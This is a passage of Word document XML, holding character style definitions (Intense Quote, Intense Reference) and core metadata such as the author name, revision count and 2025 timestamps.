    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00230E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0E63"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00230E6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322</Words>
  <Characters>1840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Malik</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Amina Malik</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-04T11:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-04T11:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>